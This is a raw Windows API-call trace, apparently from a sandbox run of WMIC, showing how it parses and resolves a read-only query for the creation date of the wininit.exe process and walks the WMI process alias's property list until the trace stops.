[0563.090] free (_Block=0x189620)
[0563.091] lstrlenW (lpString="ms_409") returned 6
[0563.091] malloc (_Size=0xe) returned 0x189620
[0563.091] lstrlenW (lpString="ms_409") returned 6
[0563.091] malloc (_Size=0x18) returned 0x189640
[0563.091] IWbemClassObject:Get (in: This=0x348940, wszName="User", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.091] free (_Block=0x189640)
[0563.091] malloc (_Size=0x18) returned 0x189640
[0563.091] IWbemClassObject:Get (in: This=0x348940, wszName="Password", lFlags=0, pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.091] free (_Block=0x189640)
[0563.091] malloc (_Size=0x18) returned 0x189640
[0563.091] IWbemClassObject:Get (in: This=0x348940, wszName="Server", lFlags=0, pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.092] free (_Block=0x189640)
[0563.092] lstrlenW (lpString=".") returned 1
[0563.092] malloc (_Size=0x4) returned 0x18cdc0
[0563.092] lstrlenW (lpString=".") returned 1
[0563.092] malloc (_Size=0x18) returned 0x189640
[0563.092] IWbemClassObject:Get (in: This=0x348940, wszName="Authority", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.092] free (_Block=0x189640)
[0563.092] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.092] IUnknown:Release (This=0x348940) returned 0x1
[0563.092] GetCurrentThreadId () returned 0x440
[0563.092] ??0CHString@@QEAA@XZ () returned 0xaf3d8
[0563.093] malloc (_Size=0x18) returned 0x189640
[0563.093] IWbemClassObject:Get (in: This=0x320380, wszName="__RELPATH", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Process\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0
[0563.093] free (_Block=0x189640)
[0563.093] malloc (_Size=0x18) returned 0x189640
[0563.093] GetCurrentThreadId () returned 0x440
[0563.093] ??0CHString@@QEAA@XZ () returned 0xaf258
[0563.093] ??0CHString@@QEAA@PEBG@Z () returned 0xaf270
[0563.093] ??0CHString@@QEAA@AEBV0@@Z () returned 0xaf200
[0563.093] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0563.093] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x18cde0
[0563.094] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
[0563.094] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xaf1c0
[0563.094] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xaf208
[0563.094] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf270
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xaf1c8
[0563.094] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf200
[0563.094] ??1CHString@@QEAA@XZ () returned 0x1
[0563.094] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x18ce40
[0563.094] ?Find@CHString@@QEBAHPEBG@Z () returned 0x7
[0563.094] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xaf1c0
[0563.094] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xaf208
[0563.094] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf270
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xaf1c8
[0563.094] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf200
[0563.094] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.094] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef5b8c960
[0563.095] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.095] malloc (_Size=0x18) returned 0x189660
[0563.095] malloc (_Size=0x18) returned 0x1896c0
[0563.095] malloc (_Size=0x18) returned 0x1896e0
[0563.095] malloc (_Size=0x18) returned 0x189700
[0563.095] malloc (_Size=0x18) returned 0x189720
[0563.095] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
[0563.095] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
[0563.095] memcpy (in: _Dst=0x311a68, _Src=0x313818, _Size=0x7a | out: _Dst=0x311a68) returned 0x311a68
[0563.095] memcpy (in: _Dst=0x311ae0, _Src=0x286718, _Size=0x30 | out: _Dst=0x311ae0) returned 0x311ae0
[0563.095] malloc (_Size=0x18) returned 0x189740
[0563.095] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
[0563.095] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x26
[0563.095] memcpy (in: _Dst=0x348718, _Src=0x311a68, _Size=0xa8 | out: _Dst=0x348718) returned 0x348718
[0563.096] memcpy (in: _Dst=0x3487be, _Src=0x30b328, _Size=0x4e | out: _Dst=0x3487be) returned 0x3487be
[0563.096] malloc (_Size=0x18) returned 0x189760
[0563.096] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x79
[0563.096] SysStringLen (param_1="\"") returned 0x1
[0563.096] memcpy (in: _Dst=0x348828, _Src=0x348718, _Size=0xf4 | out: _Dst=0x348828) returned 0x348828
[0563.096] memcpy (in: _Dst=0x34891a, _Src=0x31edc8, _Size=0x4 | out: _Dst=0x34891a) returned 0x34891a
[0563.096] free (_Block=0x189740)
[0563.096] free (_Block=0x189720)
[0563.096] free (_Block=0x189700)
[0563.096] free (_Block=0x1896e0)
[0563.096] free (_Block=0x1896c0)
[0563.096] free (_Block=0x189660)
[0563.096] IWbemServices:GetObject (in: This=0x3089a0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xaf248*=0x0, ppCallResult=0x0 | out: ppObject=0xaf248*=0x348be0, ppCallResult=0x0) returned 0x0
[0563.101] malloc (_Size=0x18) returned 0x189660
[0563.102] IWbemClassObject:Get (in: This=0x348be0, wszName="Text", lFlags=0, pVal=0xaf280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0xaf280*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbd90*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x29e1c0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0
[0563.102] free (_Block=0x189660)
[0563.102] SafeArrayGetLBound (in: psa=0x2fbd90, nDim=0x1, plLbound=0xaf260 | out: plLbound=0xaf260) returned 0x0
[0563.102] SafeArrayGetUBound (in: psa=0x2fbd90, nDim=0x1, plUbound=0xaf250 | out: plUbound=0xaf250) returned 0x0
[0563.102] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf244, pv=0xaf298 | out: pv=0xaf298) returned 0x0
[0563.102] malloc (_Size=0x18) returned 0x189660
[0563.102] malloc (_Size=0x18) returned 0x1896c0
[0563.102] SysStringLen (param_1="Process management. ") returned 0x14
[0563.103] memcpy (in: _Dst=0x2f9fe8, _Src=0x2f9f98, _Size=0x2a | out: _Dst=0x2f9fe8) returned 0x2f9fe8
[0563.103] free (_Block=0x189660)
[0563.103] IUnknown:Release (This=0x348be0) returned 0x0
[0563.103] free (_Block=0x189760)
[0563.103] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.103] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.103] free (_Block=0x189640)
[0563.103] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.103] lstrlenW (lpString="Process management. ") returned 20
[0563.104] malloc (_Size=0x2a) returned 0x188680
[0563.104] lstrlenW (lpString="Process management. ") returned 20
[0563.104] free (_Block=0x1896c0)
[0563.104] IUnknown:Release (This=0x320380) returned 0x0
[0563.104] free (_Block=0x189680)
[0563.104] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.104] lstrlenW (lpString="PATH") returned 4
[0563.104] lstrlenW (lpString="where") returned 5
[0563.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3
[0563.104] lstrlenW (lpString="WHERE") returned 5
[0563.104] lstrlenW (lpString="where") returned 5
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0563.105] lstrlenW (lpString="/") returned 1
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="/", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="-") returned 1
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="-", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] malloc (_Size=0x26) returned 0x18cde0
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] lstrlenW (lpString="/") returned 1
[0563.105] lstrlenW (lpString="get") returned 3
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="-") returned 1
[0563.105] lstrlenW (lpString="get") returned 3
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="get") returned 3
[0563.105] malloc (_Size=0x8) returned 0x18ce10
[0563.106] lstrlenW (lpString="get") returned 3
[0563.106] lstrlenW (lpString="GET") returned 3
[0563.106] lstrlenW (lpString="get") returned 3
[0563.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0563.106] lstrlenW (lpString="/") returned 1
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="/", cchCount2=1) returned 3
[0563.106] lstrlenW (lpString="-") returned 1
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="-", cchCount2=1) returned 3
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] malloc (_Size=0x1a) returned 0x18ce30
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] malloc (_Size=0x8) returned 0x18ce60
[0563.107] GetCurrentThreadId () returned 0x440
[0563.107] ??0CHString@@QEAA@XZ () returned 0xaf138
[0563.107] malloc (_Size=0x8) returned 0x18ce80
[0563.107] memmove_s (in: _Destination=0x18ce80, _DestinationSize=0x8, _Source=0x18ce60, _SourceSize=0x8 | out: _Destination=0x18ce80) returned 0x0
[0563.107] malloc (_Size=0x18) returned 0x189680
[0563.107] malloc (_Size=0x18) returned 0x1896c0
[0563.107] malloc (_Size=0x18) returned 0x189640
[0563.107] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0563.107] malloc (_Size=0x3a) returned 0x18cea0
[0563.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x18cea0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0563.112] free (_Block=0x18cea0)
[0563.112] malloc (_Size=0x18) returned 0x189760
[0563.112] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0563.112] SysStringLen (param_1="PROCESS") returned 0x7
[0563.112] memcpy (in: _Dst=0x2d6ed8, _Src=0x348718, _Size=0x3a | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0563.112] memcpy (in: _Dst=0x2d6f10, _Src=0x31ee28, _Size=0x10 | out: _Dst=0x2d6f10) returned 0x2d6f10
[0563.112] malloc (_Size=0x18) returned 0x189660
[0563.112] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0563.112] SysStringLen (param_1="'") returned 0x1
[0563.112] memcpy (in: _Dst=0x311a68, _Src=0x2d6ed8, _Size=0x48 | out: _Dst=0x311a68) returned 0x311a68
[0563.112] memcpy (in: _Dst=0x311aae, _Src=0x31edc8, _Size=0x4 | out: _Dst=0x311aae) returned 0x311aae
[0563.112] free (_Block=0x189760)
[0563.113] free (_Block=0x189640)
[0563.113] free (_Block=0x1896c0)
[0563.113] free (_Block=0x189680)
[0563.113] IWbemServices:GetObject (in: This=0x308880, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0xaf178*=0x0, ppCallResult=0x0 | out: ppObject=0xaf178*=0x320380, ppCallResult=0x0) returned 0x0
[0563.123] malloc (_Size=0x18) returned 0x189680
[0563.124] IWbemClassObject:Get (in: This=0x320380, wszName="Formats", lFlags=0, pVal=0xaf1f8*(varType=0x0, wReserved1=0x77c8, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2b80, varVal2=0xffaac79c), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1f8*(varType=0x200d, wReserved1=0x77c8, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbd90*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2fa030, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0xffaac79c), pType=0x0, plFlavor=0x0) returned 0x0
[0563.130] free (_Block=0x189680)
[0563.130] lstrlenW (lpString="SET") returned 3
[0563.131] lstrlenW (lpString="get") returned 3
[0563.131] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0563.131] SafeArrayGetLBound (in: psa=0x2fbd90, nDim=0x1, plLbound=0xaf190 | out: plLbound=0xaf190) returned 0x0
[0563.131] SafeArrayGetUBound (in: psa=0x2fbd90, nDim=0x1, plUbound=0xaf18c | out: plUbound=0xaf18c) returned 0x0
[0563.131] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf180, pv=0xaf168 | out: pv=0xaf168) returned 0x0
[0563.131] malloc (_Size=0x18) returned 0x189680
[0563.131] IWbemClassObject:Get (in: This=0x349b70, wszName="Name", lFlags=0, pVal=0xaf1d8*(varType=0x0, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x3, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1d8*(varType=0x8, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1="STATUS", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.131] free (_Block=0x189680)
[0563.131] malloc (_Size=0x18) returned 0x189680
[0563.131] lstrlenW (lpString="FULL") returned 4
[0563.131] lstrlenW (lpString="STATUS") returned 6
[0563.131] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0563.131] free (_Block=0x189680)
[0563.132] IUnknown:Release (This=0x349b70) returned 0x1
[0563.132] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf180, pv=0xaf168 | out: pv=0xaf168) returned 0x0
[0563.132] malloc (_Size=0x18) returned 0x189680
[0563.132] IWbemClassObject:Get (in: This=0x34dd70, wszName="Name", lFlags=0, pVal=0xaf1d8*(varType=0x0, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x31ee88, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1d8*(varType=0x8, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1="MEMORY", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.132] free (_Block=0x189680)
[0563.132] malloc (_Size=0x18) returned 0x189680
[0563.132] lstrlenW (lpString="FULL") returned 4
[0563.132] lstrlenW (lpString="MEMORY") returned 6
[0563.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MEMORY", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0563.132] free (_Block=0x189680)
[0563.132] IUnknown:Release (This=0x34dd70) returned 0x1
[0563.132] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf180, pv=0xaf168 | out: pv=0xaf168) returned 0x0
[0563.132] malloc (_Size=0x18) returned 0x189680
[0563.133] IWbemClassObject:Get (in: This=0x357630, wszName="Name", lFlags=0, pVal=0xaf1d8*(varType=0x0, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x31ee88, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1d8*(varType=0x8, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1="FULL", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.133] free (_Block=0x189680)
[0563.133] malloc (_Size=0x18) returned 0x189680
[0563.133] lstrlenW (lpString="FULL") returned 4
[0563.133] lstrlenW (lpString="FULL") returned 4
[0563.133] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
[0563.133] free (_Block=0x189680)
[0563.133] malloc (_Size=0x18) returned 0x189680
[0563.133] IWbemClassObject:Get (in: This=0x357630, wszName="Properties", lFlags=0, pVal=0xaf210*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2ac0, varVal2=0x1802a8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf210*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbf10*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x362640, rgsabound=((cElements=0x28, lLbound=0))), varVal2=0x1802a8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.137] free (_Block=0x189680)
[0563.137] SafeArrayGetLBound (in: psa=0x2fbf10, nDim=0x1, plLbound=0xaf1a0 | out: plLbound=0xaf1a0) returned 0x0
[0563.137] SafeArrayGetUBound (in: psa=0x2fbf10, nDim=0x1, plUbound=0xaf1a8 | out: plUbound=0xaf1a8) returned 0x0
[0563.137] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.137] malloc (_Size=0x18) returned 0x189680
[0563.137] IWbemClassObject:Get (in: This=0x362a00, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x0, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.137] free (_Block=0x189680)
[0563.137] malloc (_Size=0x18) returned 0x189680
[0563.137] IWbemClassObject:Get (in: This=0x362a00, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.137] free (_Block=0x189680)
[0563.138] malloc (_Size=0x18) returned 0x189680
[0563.138] lstrlenW (lpString="CommandLine") returned 11
[0563.138] lstrlenW (lpString="creationdate") returned 12
[0563.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CommandLine", cchCount2=11) returned 3
[0563.138] free (_Block=0x189680)
[0563.138] IUnknown:Release (This=0x362a00) returned 0x1
[0563.138] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.138] malloc (_Size=0x18) returned 0x189680
[0563.138] IWbemClassObject:Get (in: This=0x362e70, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.138] free (_Block=0x189680)
[0563.138] malloc (_Size=0x18) returned 0x189680
[0563.138] IWbemClassObject:Get (in: This=0x362e70, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.138] free (_Block=0x189680)
[0563.139] malloc (_Size=0x18) returned 0x189680
[0563.139] lstrlenW (lpString="CSName") returned 6
[0563.139] lstrlenW (lpString="creationdate") returned 12
[0563.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CSName", cchCount2=6) returned 1
[0563.139] free (_Block=0x189680)
[0563.139] IUnknown:Release (This=0x362e70) returned 0x1
[0563.139] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.139] malloc (_Size=0x18) returned 0x189680
[0563.139] IWbemClassObject:Get (in: This=0x363370, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.139] free (_Block=0x189680)
[0563.139] malloc (_Size=0x18) returned 0x189680
[0563.139] IWbemClassObject:Get (in: This=0x363370, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.139] free (_Block=0x189680)
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.140] lstrlenW (lpString="Description") returned 11
[0563.140] lstrlenW (lpString="creationdate") returned 12
[0563.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Description", cchCount2=11) returned 1
[0563.140] free (_Block=0x189680)
[0563.140] IUnknown:Release (This=0x363370) returned 0x1
[0563.140] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.140] IWbemClassObject:Get (in: This=0x363620, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.140] free (_Block=0x189680)
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.140] IWbemClassObject:Get (in: This=0x363620, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.140] free (_Block=0x189680)
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.141] lstrlenW (lpString="ExecutablePath") returned 14
[0563.141] lstrlenW (lpString="creationdate") returned 12
[0563.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutablePath", cchCount2=14) returned 1
[0563.141] free (_Block=0x189680)
[0563.141] IUnknown:Release (This=0x363620) returned 0x1
[0563.141] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.141] malloc (_Size=0x18) returned 0x189680
[0563.141] IWbemClassObject:Get (in: This=0x363d90, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.141] free (_Block=0x189680)
[0563.141] malloc (_Size=0x18) returned 0x189680
[0563.141] IWbemClassObject:Get (in: This=0x363d90, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.141] free (_Block=0x189680)
[0563.141] malloc (_Size=0x18) returned 0x189680
[0563.141] lstrlenW (lpString="ExecutionState") returned 14
[0563.142] lstrlenW (lpString="creationdate") returned 12
[0563.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutionState", cchCount2=14) returned 1
[0563.142] free (_Block=0x189680)
[0563.142] IUnknown:Release (This=0x363d90) returned 0x1
[0563.142] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.142] malloc (_Size=0x18) returned 0x189680
[0563.142] IWbemClassObject:Get (in: This=0x364280, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.142] free (_Block=0x189680)
[0563.142] malloc (_Size=0x18) returned 0x189680
